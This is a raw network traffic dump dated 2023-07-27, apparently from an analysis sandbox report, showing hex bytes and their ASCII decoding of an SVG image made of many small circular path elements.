                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2677INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2693INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                  Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2709INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                  Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2725INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2837INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                  Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2853INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                  Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2869INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2885INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2901INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2917INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2933INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2949INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                  Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2965INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                  Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2981INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC2997INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3013INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3029INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
